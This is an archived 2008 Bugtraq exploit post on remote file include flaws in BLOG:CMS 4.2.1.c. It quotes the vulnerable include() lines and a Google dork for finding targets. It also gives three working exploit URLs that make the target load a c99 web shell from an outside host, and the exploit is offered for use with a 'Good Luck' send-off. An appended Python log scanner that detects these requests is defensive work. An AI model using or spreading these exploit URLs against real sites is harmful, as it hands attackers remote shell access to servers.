Open Source and information security mailing list archives
 
Date: Mon, 21 Jan 2008 05:49:56 +0300
From: رومانسي هكر <rxhr@...mail.com>
To: <bugtraq@...urityfocus.com>
Subject: BLOG:CMS 4.2.1.c (DIR_PLUGINS)  Multiple Remote File Include


# Name : BLOG:CMS 4.2.1.c (DIR_PLUGINS)  Multiple Remote File Include
# Download From : http://dfn.dl.sourceforge.net/sourceforge/blogcms/blogcms.4.2.1.c.7z
Or Here http://blogcms.com
# Found By : RoMaNcYxHaCkEr                  We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet :(     Tryag.cc/cc        No-Hack.net     V99x.com/vb               Hackteach.org/cc
Google Dork : Powered by  Personal Content Management System © 2003-2005 Radek Hulán

============================================================================

# Vulnerable Code In Files index.php & media.php & server.php :

index.php In Line 19 :

include($DIR_PLUGINS."related/nusoap.php");

media.php In Line 32 :

include($DIR_LIBS . 'MEDIA.php');

server.php In Line 69 :

include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");

# Exploit :

http://Www.RxH.CoM/blogcms/index.php?DIR_PLUGINS=http://no-hack.net/shells/c99.txt?

http://Www.RxH.CoM/blogcms/admin/media.php?DIR_LIBS=http://no-hack.net/shells/c99.txt?

http://Www.RxH.CoM/blogcms/admin/xmlrpc/server.php?DIR_LIBS=http://no-hack.net/shells/c99.txt?

That's It

Good Luck Everybody
============================================================================

# Greet To :

"Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org)

Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc"  (Tryag.com)

Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or , KsA HaCkEr ...etc" (V99x.com)

Sniper-Sa TeaM :"Sniper-sa , Golden-Hacker , Sho3ter , VerySecret , nOUR-Ice ....etc"(Sniper-sa.com)

Yee7 TeaM : "ShockShadow ( My Best Friend ), HoUrIcAn , ...etc"(Yee7.com)

H-T TeaM : " Houusamix , ToXiC "(no-hack.net)

Str0ck (Milw0rm.com)

Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , AlQaTaRi , God-Father And All My Friends

# For Contact : RxH@...Mail.iT

# Note : Always Don't See In The Top To Feeling Pain In Your Neck !!!

Best Wishes
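
For defenders, an added example that is not part of the original post: a log check that flags requests supplying the DIR_PLUGINS or DIR_LIBS variables named in the advisory. It assumes combined-format access logs; the sample lines, hosts and addresses are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WATCHED = {"DIR_PLUGINS", "DIR_LIBS"}  # variable names taken from the advisory
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.I)  # http:, ftp:, php:, data: ...
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2008:05:50:01 +0300] "GET /blogcms/index.php?DIR_PLUGINS=http://files.example.invalid/probe.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Jan/2008:05:50:04 +0300] "GET /blogcms/admin/media.php?DIR_LIBS=%2568ttp%253A%252F%252Ffiles.example.invalid%252Fprobe.txt HTTP/1.1" 200 498',
    '203.0.113.9 - - [21/Jan/2008:05:51:10 +0300] "GET /blogcms/admin/xmlrpc/server.php?DIR_LIBS=../../tmp/ HTTP/1.1" 500 0',
    '198.51.100.4 - - [21/Jan/2008:05:52:00 +0300] "GET /blogcms/index.php?itemid=12 HTTP/1.1" 200 8841',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so an encoded scheme is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return [(param, verdict)] for watched parameters in one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    for name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if name in WATCHED:
            # A path variable should never arrive from the client at all;
            # a value carrying a URL scheme is a remote-include attempt.
            remote = SCHEME.match(fully_decode(raw))
            findings.append((name, "remote-include" if remote else "path-override"))
    return findings

def scan(lines):
    """Return [(line_number, param, verdict)] across a log, 1-indexed."""
    return [(n, p, v) for n, line in enumerate(lines, 1) for p, v in classify(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only query strings are inspected, so the same parameters sent in a POST body will not appear in an access log and need request-body logging or a filter in front of the application.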
